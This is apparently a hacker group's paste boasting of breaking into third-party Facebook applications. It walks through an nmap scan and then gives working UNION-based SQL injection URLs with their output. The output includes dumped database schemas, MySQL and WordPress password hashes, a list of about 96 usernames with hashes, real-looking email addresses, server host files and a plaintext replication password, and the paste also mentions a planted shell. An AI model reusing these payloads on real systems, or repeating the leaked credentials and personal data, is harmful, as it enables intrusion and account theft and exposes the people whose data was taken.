Facebook server data leaked by alpha zone

   
        English translation
   
            AlpHa zONE
   
             data leak by cybxr :D and LEgit Hacker
   
   
    [0x00] [Introduction]
    [0x01] [First impressions]
    [0x02] [Search for bugs]
    [0x03] [Crash Exploit]
    [0x04] [Conclusion]
    [0x05] [Greetz]
   
   
   
   
   
   
       __             __      __  
     /'__`\         /'__`\  /'__`\
    /\ \/\ \  __  _/\ \/\ \/\ \/\ \
    \ \ \ \ \/\ \/'\ \ \ \ \ \ \ \ \
     \ \ \_\ \/>  </\ \ \_\ \ \ \_\ \
      \ \____//\_/\_\\ \____/\ \____/
       \/___/ \//\/_/ \/___/  \/___/
              [Introduction]
   
   
   
   
    + [En] => In this log file you will read a limited version of the information gathered and provided, since the most important
    parts are being kept private in order to be analyzed by the proper authorities and close loopholes in the system.
   
    We did not change the main page, do not sell backup server does not delete files.
   
    We have demonstrated the flaw in the system. Start =] ..
   
   
   
       __             __      _  
     /'__`\         /'__`\  /' \  
    /\ \/\ \  __  _/\ \/\ \/\_, \
    \ \ \ \ \/\ \/'\ \ \ \ \/_/\ \
     \ \ \_\ \/>  </\ \ \_\ \ \ \ \
      \ \____//\_/\_\\ \____/  \ \_\
       \/___/ \//\/_/ \/___/    \/_/
            [First impressions]
   
   
   
   
    At first glance, FaceBook well protected social network.
    Scanning FaceBook server did not give nothing interesting ... )
   
    ..>
   
    Initiating Parallel DNS resolution of 1 host.
    Completed Parallel DNS resolution of 1 host.
    Initiating SYN Stealth Scan
    Scanning facebook.com (69.63.181.11) [1000 ports]
    Discovered open port 443/tcp on 69.63.181.11
    Discovered open port 80/tcp on 69.63.181.11
    Completed SYN Stealth Scan 13.16s elapsed (1000 total ports)
    Initiating Service scan
    Scanning 2 services on facebook.com (69.63.181.11)
    Service scan Timing: About 50.00% done; ETC:
    Completed Service scan at 22:41, 104.15s elapsed (2 services on 1 host)
    NSE: Script scanning 69.63.181.11.
    NSE: Starting runlevel 1 (of 1) scan.
    Initiating NSE at 22:41
    Completed NSE at 22:41, 0.38s elapsed
    NSE: Script Scanning completed.
    Nmap scan report for facebook.com (69.63.181.11)
    Host is up (0.17s latency).
    Hostname facebook.com resolves to 4 IPs. Only scanned 69.63.181.11
    rDNS record for 69.63.181.11: www-10-01-snc2.facebook.com
    Not shown: 998 filtered ports
    PORT STATE SERVICE VERSION 80/tcp open http 443/tcp open ssl/https
   
   
    go ahead .. =]
   
   
       __             __      ___  
     /'__`\         /'__`\  /'___`\
    /\ \/\ \  __  _/\ \/\ \/\_\ /\ \
    \ \ \ \ \/\ \/'\ \ \ \ \/_/// /__
     \ \ \_\ \/>  </\ \ \_\ \ // /_\ \
      \ \____//\_/\_\\ \____//\______/
       \/___/ \//\/_/ \/___/ \/_____/
             [Search for bugs]
   
   
   
    We use GoOgle.com
   
    request: Facebook+Vulnerability [search]
   
    We see a lot of different bug / exploits / etc ... Most see only XSS Vulnerabilities
   

    All vulnerabilities are closed (Nothing does not work ... Let us once again to GoOgle.com
   
    request: site:facebook.com WARNING error
   
    =\ fuck...
        Let us not lose heart) Hackers are not looking for easy ways
   
   
    Visit Facebook.com
   
    Let us search bugs in Web Apps.
   
    http://www.facebook.com/robots.txt
   
   
    oooooooooooooooooooooooooooo
    User-agent: *
    Disallow: /ac.php
    Disallow: /ae.php
    Disallow: /album.php
    Disallow: /ap.php
    Disallow: /feeds/
    Disallow: /p.php
    Disallow: /photo_comments.php
    Disallow: /photo_search.php
    Disallow: /photos.php
   
    User-agent: Slurp
    Disallow: /ac.php
    Disallow: /ae.php
    Disallow: /album.php
    Disallow: /ap.php
    Disallow: /feeds/
    Disallow: /p.php
    Disallow: /photo.php
    Disallow: /photo_comments.php
    Disallow: /photo_search.php
    Disallow: /photos.php
   
    User-agent: msnbot
    Disallow: /ac.php
    Disallow: /ae.php
    Disallow: /album.php
    Disallow: /ap.php
    Disallow: /feeds/
    Disallow: /p.php
    Disallow: /photo.php
    Disallow: /photo_comments.php
    Disallow: /photo_search.php
    Disallow: /photos.php
   
    # E-mail webmaster@facebook.com and alex@facebook.com if you're authorized to access these, but getting denied.
    Sitemap: http://www.facebook.com/sitemap.php
    00000000000000000000000000000000
   
    nothing interesting =\
   
    http://apps.facebook.com/tvshowchat/
   
    I looked closely, I noticed links
   
    http://apps.facebook.com/tvshowchat/show.php?id=1 habit to check the variable vulnerability...
   
    check:
   
    http://apps.facebook.com/tvshowchat/show.php?id=inj3ct0r
   
   
    ooooooooooooooooooooooooooo
   
    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 28
   
    Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
   
    Warning: simplexml_load_string() [function.simplexml-load-string]: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
   
    Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
   
    Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : SystemLiteral " or ' expected in /home/tomkincaid
   
    Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
   
    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 164
   
    and other....
   
    oooooooooooooooooooooooooooo
   
   
    O_o opsss! After sitting for a while, I realized that one of the servers is on MySql.
   
    Writing exploits, I got the following:
      http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+@@version--+1
   
   
    ooooooooooooooooooooooooooo
   
    Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
   
    Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
   
    Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
   
    Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
   
    Warning: simplexml_load_string() [function.simplexml-load-string]: </html> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
   
    5.0.45-log <= ALERT!!!
   
    Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
   
    and other....
   
    oooooooooooooooooooooooooooo
   
   
    Database : adminclt_testsite
    Database User : adminclt_13@209.68.2.10
    MySQL Version : 5.0.67-log
   
   
    super = ] Now, we just can say that there is SQL Injection Vulnerability
   
    http://apps.facebook.com/tvshowchat/show.php?id=[SQL Injection Vulnerability]
   
    Now we know that there is MySql 5.0.45-log
   
    Then let's write another exploit to display tables with information_schema.tables:
   
    http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+information_schema.tables--+1
   
   
    oooooooooooooooooooooooooooo
   
    Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
   
    Warning: Invalid argument supplied for foreach() in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 38
   
    Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from information_schema.tables-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/
   
    201 <= ALERT!!! 201 tables!
   
    Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
   
    and other....
   
    oooooooooooooooooooooooooooo
   
    http://apps.facebook.com/observerfacebook/?p=challenges&id=[SQL INJ3ct0r]
   
    Database : adminclt_testsite
    Database User : adminclt_13@209.68.2.10
    MySQL Version : 5.0.67-log
   
   
    1) AdCode
    2) AdTrack
    3) Admin_DataStore
    4) Admin_User
    5) Challenges
    6) ChallengesCompleted
    7) Comments
    8) ContactEmails
    9) Content
    10) ContentImages
    11) FeaturedTemplate
    12) FeaturedWidgets
    13) Feeds
    14) FolderLinks
    15) Folders
    16) ForumTopics
    17) Log
    18) LogDumps
    19) Newswire
    20) NotificationMessages
    21) Notifications
    22) Orders
    23) OutboundMessages
    24) Photos
    25) Prizes
    26) RawExtLinks
    27) RawSessions
    28) SessionLengths
    29) Sites
    30) Subscriptions
    31) SurveyMonkeys
    32) SystemStatus
    33) Templates
    34) User
    35) UserBlogs
    36) UserCollectives
    37) UserInfo
    38) UserInvites
    39) Videos
    40) WeeklyScores
    41) Widgets
    42) cronJobs
    43) fbSessions
   
    Admin_User
   
    1) id
    2) name
    3) email
    4) password
    5) userid
    6) ncUid
    7) level
   
    User
   
    1) userid
    2) ncUid
    3) name
    4) email
    5) isAdmin
    6) isBlocked
    7) votePower
    8) remoteStatus
    9) isMember
    10) isModerator
    11) isSponsor
    12) isEmailVerified
    13) isResearcher
    14) acceptRules
    15) optInStudy
    16) optInEmail
    17) optInProfile
    18) optInFeed
    19) optInSMS
    20) dateRegistered
    21) eligibility
    22) cachedPointTotal
    23) cachedPointsEarned
    24) cachedPointsEarnedThisWeek
    25) cachedPointsEarnedLastWeek
    26) cachedStoriesPosted
    27) cachedCommentsPosted
    28) userLevel
   
    http://apps.facebook.com/ufundraise/fundraise.php?cid=[SQL INJ3CT0R]
   
    Current Database : signalpa_fbmFundRraise
    Database User : signalpa_rockaja@localhost
    MySQL Version : 5.0.85-community
   
    DATABASE
    1) information_schema
    2) signalpa_CelebrityPuzzle
    3) signalpa_EBF
    4) signalpa_appNotification
    5) signalpa_appnetwork
    6) signalpa_dailyscriptures
    7) signalpa_ebayfeed
    8) signalpa_fbmFundRraise
    9) signalpa_fbmFundRraisebeta
    10) signalpa_netcards
    11) signalpa_paypal
    12) signalpa_thepuzzle
   
    signalpa_fbmFundRraise
    1) Campaigns
    2) Campaigns_Temp
    3) FB_theme
    4) IfundDollars
    5) Languages
    6) Payments
    7) Paymentsoops
    8) Supporters
    9) Users
    10) Withdrawals
    11) invites
    12) invites_copy
    13) mp_passwords
    14) payment_codes
    15) txt_codes
    16) valid_servers
    17) weeklyBonus
   
        Column: Users
   
   
    1) id
    2) name
    3) email
    4) mobile_no
    5) address
    6) country
    7) password
    8) organisation
    9) date_created
    10) date_updated
    11) status
    12) facebook_id
    13) isFacebookFan
    14) verify
    15) paypalUse
    16) paypalEmail
    17) bacUse
    18) bacAcc
    19) bacName
    20) bacLocation
    21) bacCountry
    22) bacIBAN
    23) bacSort_code
    24) current_rank
    25) new_rank
    26) cronjob
    27) max_fundraise
   
        Column: mp_passwords
   
    1) id
    2) password
    3) username
    4) status
    5) number
    6) rc
    7) referer
    8) transID
    9) currency
    10) transType
    11) amount
    12) confirmed
    13) date
   
    signalpa_paypal
    1) paypal_cart_info
    2) paypal_payment_info
    3) paypal_subscription_info
    [1] AdrianW: [1] c6553032e2f1bcaf30aa333d0228b783:
    [2] Akwala: [2] b0c08027fd0f4deec8515c47125de023:
    [3] Aldri: [3] 0366923e9c631e65e30315eff2a14a59:
   
    Column: paypal_cart_info
    1) txnid
    2) itemname
    3) itemnumber
    4) os0
    5) on0
    6) os1
    7) on1
    8) quantity
    9) invoice
    10) custom
   
        Column : paypal_payment_info
   
    1) firstname
    2) lastname
    3) buyer_email
    4) street
    5) city
    6) state
    7) zipcode
    8) memo
    9) itemname
    10) itemnumber
    11) os0
    12) on0
    13) os1
    14) on1
    15) quantity
    16) paymentdate
    17) paymenttype
    18) txnid
    19) mc_gross
    20) mc_fee
    21) paymentstatus
    22) pendingreason
    23) txntype
    24) tax
    25) mc_currency
    26) reasoncode
    27) custom
    28) country
    29) datecreation
   
   
    http://apps.facebook.com/tvshowchat/show.php?id=[SQL INJ3CT0R]
   
   
    Current Database : tv
    Database User : tomkincaid@ps5008.dreamhost.com
    MySQL Version : 5.0.45-log
   
        DATABASES
   
   
    1) information_schema
    2) astro
    3) candukincaid
    4) cemeteries
    5) churchwpdb
    6) countdownapp
    7) crush
    8) dare
    9) friendiq
    10) giants
    11) hookup
    12) jauntlet
    13) loccus
    14) luciacanduwp
    15) maps
    16) martisor
    17) mediax
    18) mostlikely
    19) music
    20) pimpfriends
    21) plans
    22) politicsapp
    23) postergifts
    24) posters2
    25) projectbasecamp
    26) pwnfriends
    27) quiz
    28) seeall
    29) send
    30) supporter
    31) swapu
    32) tomsapps
    33) travelbug
   
        tab.send
   
   
    1) app
    2) item
    3) itemforuser
    4) neverblue
    5) user
   
        Columns
   
    user(12454)
   
    1) userid
    2) siteid
    3) appkey
    4) session
    5) points
    6) added
    7) removed
   
    Tab. candukincaid
   
    1) wp_comments
    2) wp_links
    3) wp_options
    4) wp_post****
    5) wp_posts
    6) wp_px_albumPhotos
    7) wp_px_albums
    8) wp_px_galleries
    9) wp_px_photos
    10) wp_px_plugins
    11) wp_term_relationships
    12) wp_term_taxonomy
    13) wp_terms
    14) wp_user****
    15) wp_users
   
   
        Column wp_users
   
   
    1) ID
    2) user_login
    3) user_pass
    4) user_nicename
    5) user_email
    6) user_url
    7) user_registered
    8) user_activation_key
    9) user_status
    10) display_name
   
    etc...
   
    http://apps.facebook.com/fluff/fluffbook.php?id=[SQL Inj3ct0r]
   
    > ~ inj3ct0r_facebook_exploit [ENTER]
   
    root:*368C08021F7260A991A9D8121B7D7808C99BBB8A
    slave_user:*38E277D5CA4EAA7E9A73F8EF80813D7B5859E407
    muu:*74A45B921A1A918B18AE9B137396E5A67E006262
    monitor:*1840AE2C95804EC69321D1EE33AADFA249817034
    maatkit:*9FA5157314A2CF7448A34DA070B5D44E977A1220
   
    http://apps.facebook.com/snowago/area.php?areaid=[SQL Inj3ct0r]
   
    Database: affinispac_fb
    User: affinispac_fb@localhost
    Version: 5.0.67-community
   
    http://www.chinesezodiachoroscope.com/facebook/index1.php?user_id=[SQL Inj3ct0r]
   
    >plucky@localhost : facebook : 4.0.13-log
   
    etc... =]
   
   
    Next xD
   
    Database: thetvdb
     User: thetvdb@localhost
     Version: 5.0.51a-24-log
   
   
    [Database]: thetvdb
   
   
    [1]aka_seriesname
    [2]apiusers
    [3]banners
    [4]deletions
    [5]genres
    [6]imgstatus
    [7]languages
    [8]mirrors
    [9]networks
    [10]ratings
    [11]runtimes
    [12]seriesactors
    [13]seriesupdates
    [14]translation_episodename
    [15]translation_episodeoverview
    [16]translation_labels
    [17]translation_seriesname
    [18]translation_seriesoverview
    [19]tvepisodes
    [20]tvseasons
    [21]tvseries
    [22]user_episodes
    [23]users
   
    users:
   
       id,username,userpass,emailaddress,ipaddress,userlevel,languageid,favorites,
       favorites_displaymode,bannerlimit,banneragreement,active,uniqueid,
       lastupdatedby_admin,mirrorupdate
   
   
    [userpass]
   
    [1] *E92C1AB432D14ACA4D6618A9DFC22810363B114E:
    [2] *C62726955C4492A6A0CB7319C3928DACEAC4C66D:
    [3] *887C5DA43E5ACEE73689956A4497C0EDA956E790:
    [4] *57D6D9BF9F1962C9A006BB451FAF21693624391E:
    [5] *51121B1DC695FF11A3AEF514AAA0C487611FD98B:
    [6] 3d801aa532c1cec3ee82d87a99fdf63f
   
    [Database]: wiki
   
   
    [24]archive
    [25]categorylinks
    [26]externallinks
    [27]filearchive
    [28]hitcounter
    [29]image
    [30]imagelinks
    [31]interwiki
    [32]ipblocks
    [33]job
    [34]langlinks
    [35]logging
    [36]math
    [37]objectcache
    [38]oldimage
    [39]page
    [40]page_restrictions
    [41]pagelinks
    [42]querycache
    [43]querycache_info
    [44]querycachetwo
    [45]recentchanges
    [46]redirect
    [47]revision
    [48]searchindex
    [49]site_stats
    [50]templatelinks
    [51]text
    [52]trackbacks
    [53]transcache
    [54]user
    [55]user_groups
    [56]user_newtalk
    [57]watchlist
   
    user:
   
      user_id,user_name,user_real_name,user_password,user_newpassword,user_newpass_time,
      user_email,user_options,user_touched,user_token,user_email_authenticated,user_email_token,
      user_email_token_expires,user_registration,user_editcount
   
    ['user_name'] : ['user_pass']
   
   
    [1] AdrianW: [1] c6553032e2f1bcaf30aa333d0228b783:
    [2] Akwala: [2] b0c08027fd0f4deec8515c47125de023:
    [3] Aldri: [3] 0366923e9c631e65e30315eff2a14a59:
    [4] AleX: [4] afbb46ebf8c46bfb1f286df87d577f87:
    [5] Arucard: [5] e94f2b46cbfc681d2346424d7e0e3b3f:
    [6] AxesDenyd: [6] a998f782d92a8af1c683e6a0e36404e4:
    [7] Badubo: [7] 5a8920177dbf9abddefe4ff49ebbc67c:
    [8] Bjarkimg: [8] fd6a9eef25ead144df9592087bb4aec5:
    [9] BrandonB1218: [9] 62cda59cc492df4f1b1dd4d1365b5ff5:
    [10] Bsudbury: [10] 827d07956629c37855f3518374821872:
    [11] Burchard: [11] 4dc05fcbbf5850d27e627d5c4278c4cf:
    [12] Carla: [12] f41991b4dfd3b494c39751225e1faa29:
    [13] Click170: [13] 9c38b5f4673372a806f38a4dade456cc:
    [14] Coco: [14] f6770367b7ca8261a25ea797c24761aa:
    [15] Corte: [15] 9add39f338de37ce1cf52eaed38b09b2:
    [16] Crippler: [16] b3d947a82648b2707130f176204cbbfd:
    [17] Dbkungfu: [17] 0bcb65441f47097f85af79c793c74b95:
    [18] Deuce911: [18] 0220c76e24b82236675500f1e536a4be:
    [19] DigitallyBorn: [19] 3e57b721280c35ba66f2a151e19c620b:
    [20] Divervan10: [20] 1ad65386e69de0896f49c7d0fbaa0cba:
    [21] Donovan: [21] 03e4e11728c5f16fc936cb4c1d803029:
    [22] Drkshenronx: [22] ea0b8397ad79d255195780e367ccf026:
    [23] Emigrating12: [23] c45db536613d53252d00be3dc81cbde0:
    [24] Emphatic: [24] 3195961b90ea2fe0ac6d12efac8fef19:
    [25] Eta: [25] f083e5e3fd924342f77e4111df8788e1:
    [26] Farrism: [26] efef4efa85d73ca0247052687ca9683b:
    [27] Fiven: [27] 5f6dd4fde7d37c19d1e267618f55d35f:
    [28] FloVi: [28] 918f77c2a0fe807b3cff8816b8aed8ee:
    [29] Fritigern: [29] 6a16028b432de68363a20912c31bca03:
    [30] Furby: [30] 117088a3b9b504ce23c7926c8691fced:
    [31] Gerph: [31] 294d0c1541c7d892962cb51d540753c1:
    [32] Hallvar: [32] 4a5da5086b99a7d2f8aef976d364d07c:
    [33] Happyfrog: [33] 189a598dbdf27734a47c4731c099712d:
    [34] Hjeffrey: [34] 9b6daf5130c8c1a329a1e6ceff31d448:
    [35] Hsvjez: [35] fef14c536557ec3b0727246e6f57fadb:
    [36] Jase81: [36] 9e4c45874be6735b6432e5f060660a46:
    [37] Jcnetdev: [37] 88a2dc251c777d48189501a79e3d3ffa:
    [38] Jcpmcdonald: [38] 083968e4c21e6f3ff47c3fefad7c3ff7:
    [39] Jobba: [39] 699cb250cc53224bf0220d4c8f513a27:
    [40] Jschek: [40] 9bcf4c5f58764dc4c812b78276d5e412:
    [41] Juliani1024: [41] c5ea2a208e8e24bd0e3696be6de3bd07:
    [42] Kakosi: [42] b747252b62d95163a083acf54141bfc6:
    [43] KelleyCook: [43] b929c4422b9ea29845d1bf46fde7e765:
    [44] Ken brueck: [44] 1fd5e065ac6587cf351dee24f79def76:
    [45] Kennykixx: [45] 2a4a9abc742f3508fa37f37e30ed480b:
    [46] Kermtfrg: [46] cbaef6f6fa9175d419af3395f25bd814:
    [47] Keydon: [47] e9e984ed67c7e8a67f3406c5506293ec:
    [48] Kraigspear: [48] ac70640d36b6c9a3fcff3f66687fd3d5:
    [49] Krisg1984: [49] c78ea770e941c369aa3463c9a74d2f1d:
    [50] Leecole: [50] 4b3b865528e582b6a4dfc9430aec1ea8:
    [51] Livemac: [51] 0e36e0b0866b8911216c464fe8440319:
    [52] Markscore: [52] 5710cbdd3de7e28c7c93eb8e48e266a9:
    [53] Mcmanuss8: [53] 6262c8e4c7a5bb9d49743c5659d3cc40:
    [54] Mcoit: [54] 980a1ea1d9fd960208d004fe7ce928fb:
    [55] Mhale62: [55] df318f477b0c4a3e4f9f3e1ced62f607:
    [56] Mjh ca: [56] 07223e31ea0a8a617934081475d9ad52:
    [57] Mreuring: [57] 42472c97f021f725cea7670b078795a1:
    [58] Nathanlburns: [58] b7e16c89320be1b9860dcb83a082881a:
    [59] Nekocha: [59] 490c01eea35370bca2c78dce7ab633da:
    [60] Ngoring: [60] a19430b436a03fdfda8818f8cf486580:
    [61] Nighthawk92: [61] e8c8cf0eeaec4841c14ede3bcac7e6bb:
    [62] Null dev: [62] 4e744d982a173d0e1439787da27f022c:
    [63] Nunovi: [63] 7325e3df990caadddf2423cf96272fed:
    [64] Obsidianpanther: [64] 53fd2e06ca60a0640cdc617681ace453:
    [65] PLUCKYHD: [65] 2ac1aa8f8e5341788c9ca7555cc10714:
    [66] Plambert: [66] 9333604b2eefdcc01debb843373ae492:
    [67] Polargeek: [67] d0394680e24f75e7dae4e0ca23756161:
    [68] QyleCoop: [68] af49b70536b2ec2439095947bab36b43:
    [69] Ramsay: [69] 317192baea92e857e27c96e80c9f6874:
    [70] Scrooge666: [70] 8498d4d9c8de0300f0b8b3bc789d6731:
    [71] SeaLawyer: [71] 14dd3e79c6f486319e39ef694cd61a2d:
    [72] Searlea: [72] 058beaa0d231d457136015119da5aa34:
    [73] Serberus: [73] ff80d6419f6be5d76dd404fdb256eb3c:
    [74] Skillzzz: [74] 5f012a10f4eeddacfd2c495f64dbd975:
    [75] Smakkie: [75] 7143a09106678ec593eec82fcf3e66fd:
    [76] Smoko: [76] d9a1360bfcdedb3c6f48a37442d58dd8:
    [77] Smuto: [77] 20ec74ff3d72d42f7593002b0d28a540:
    [78] Stdly: [78] 4d7b92f616ffe6b420180e859bf245ba:
    [79] Swiip: [79] 120cc4e935a2c57763709392c5eb6fdf:
    [80] Szsori: [80] e7fb98c3d405dcc89314996b9c5c6cb2:
    [81] THe-BiNk: [81] 49e6e431cccf6a77bf6dafa0c96a361a:
    [82] TheStapler: [82] 7278b0168b8cfb38e64d2b6abe6991fc:
    [83] Todu: [83] 2173ff53b1fb2bbe3fd49d3d17b6f09f:
    [84] TommyD: [84] ca62c603dffc337b87a662fa904caa51:
    [85] TrocdRonel: [85] 318698c02f2f6ea7fef38e17cdaa1ac5:
    [86] Trol1234: [86] ce07cb60f64f2119a657a1427edc359e:
    [87] Trolik123456: [87] d392ceb168469aca3b21e1aaeb00f301:
    [88] Trolik23512: [88] dd16749110a800511459fa4ed655b36c:
    [89] Trololo23512: [89] 3d508eed899c625389167d2216fae370:
    [90] Weaverslodge: [90] c2c22a2c65b487915911c1d7f66b85e8:
    [91] Woodstock123: [91] ba4d45f8c7e9574dd839993a2001d5cd:
    [92] Wwarby: [92] 04409a510d208e737fa00cd97c712740:
    [93] Yabba: [93] 4b1febeed49cd185a8efbb8a61f68d74:
    [94] Zombiigraet33456904: [94] 028785be8488292e8b88137b5fd2c128:
    [95] Zombiigraet33456906: [95] 4820e4653d77bb3ccab9e7ed25155a5b:
    [96] Zubbizub1212: [96] ea2e5c44c48ce8f880a0f1627e599868:
   
    ---------------------------------------------------------------------------------------------------------------------------------------------------
   
    read /etc/hosts
   
    127.0.0.1 localhost localhost.localdomain
    192.168.1.167 140696-db2.flufffriends.com 140696-db2
    192.168.1.166 140695-db1.flufffriends.com 140695-db1
    192.168.1.165 140694-web2.flufffriends.com 140694-web2
    192.168.1.164 140693-web1.flufffriends.com 140693-web1
    69.63.176.141 api.facebook.com
    208.116.17.80 peanutlabs.com
   
    ----------------------------------
   
    /etc/my.cnf
   
    #SERVER 5 IS THE MASTER FOR DB1 AND ROMIS FOR DB1
   
    log-bin=/var/lib/mysqllogs/bin-log
   
    binlog-do-db=fluff2
   
    expire-logs-days=14
   
   
   
    server-id = 5
   
   
   
    #master-host=69.63.176.141
   
    #master-user=romis_user
   
    #master-password=romis0123
   
    #master-connect-retry=60
   
    replicate-do-db=miserman
   
   
    #log-slave-updates
   
    expire_logs_days = 14
   
   
    I think we found a sufficient number of vulnerabilities!
   
    ---------------------------
   
       __             __      __  
     /'__`\         /'__`\  /'__`\
    /\ \/\ \  __  _/\ \/\ \/\_\L\ \
    \ \ \ \ \/\ \/'\ \ \ \ \/_/_\_<_
     \ \ \_\ \/>  </\ \ \_\ \/\ \L\ \
      \ \____//\_/\_\\ \____/\ \____/
       \/___/ \//\/_/ \/___/  \/___/
     
   
   
   
    So .. Moving on to the fun friends
   
    To avoid Vandal effects of script-kidds I will not give you a link to shell.php, but I enclose you images and some interesting queries =]
   
    ..> Exploit start . + . + . + . + . + . + .
   
    wp_posts
   
    post_password
   
    wp_users
   
    user_pass
   
    done.....
   
   
    WordPress! oO one of the modules installed in facebook is Wordpress!
   
   
    check link: http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+candukincaid.wp_users--+1
   
   
    oooooooooooooooooooooooooooo
   
    Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
   
    Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
   
    Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
   
    Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
   
    Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from candukincaid.wp_users-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 67
   
    3 <= ALERT! Users! =]
   
    Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
   
    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 124
   
    oooooooooooooooooooooooooooo
   
    ..> Crach_exploit [ENTER]
   
    user:
   
    admin:$P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/
    lucia:$P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/
    tom:$P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR.
   
    cracker:
   
    admin : $P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/ :admin:lcandu@yahoo.com
    lucia : $P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/ :lucia:lcandu@yahoo.com
    tom : $P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR.   :tom:tom_kincaid@hotmail.com
   
    see request:
   
   
    http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws(0x3a,user_login,user_pass)+from+candukincaid.wp_users+limit+1--
    http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+1,1--
    http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+2,1--
   
   
   
    goOd =] Nice Hacking old school xD
   
   
       __             __   __ __    
     /'__`\         /'__`\/\ \\ \  
    /\ \/\ \  __  _/\ \/\ \ \ \\ \  
    \ \ \ \ \/\ \/'\ \ \ \ \ \ \\ \_
     \ \ \_\ \/>  </\ \ \_\ \ \__ ,__\
      \ \____//\_/\_\\ \____/\/_/\_\_/
       \/___/ \//\/_/ \/___/    \/_/
               [Conclusion]
   
                                     
   
    There's no 100% security! Be safe my friends! Watch for vulnerabilities and promptly update!  (Alpha zone Exploit Database)
   
   
   
       __             __   ______  
     /'__`\         /'__`\/\  ___\
    /\ \/\ \  __  _/\ \/\ \ \ \__/
    \ \ \ \ \/\ \/'\ \ \ \ \ \___``\
     \ \ \_\ \/>  </\ \ \_\ \/\ \L\ \
      \ \____//\_/\_\\ \____/\ \____/
       \/___/ \//\/_/ \/___/  \/___/
                 [Greetz]
   
   
   
    Greetz all Member Alpha zone
   
   
   
   
   
   
   
    GoOd luck Hackers! =]
   
   
    https://www.facebook.com/AlphaZoneOfficial
    like us ^

create a new version of this paste RAW Paste Data
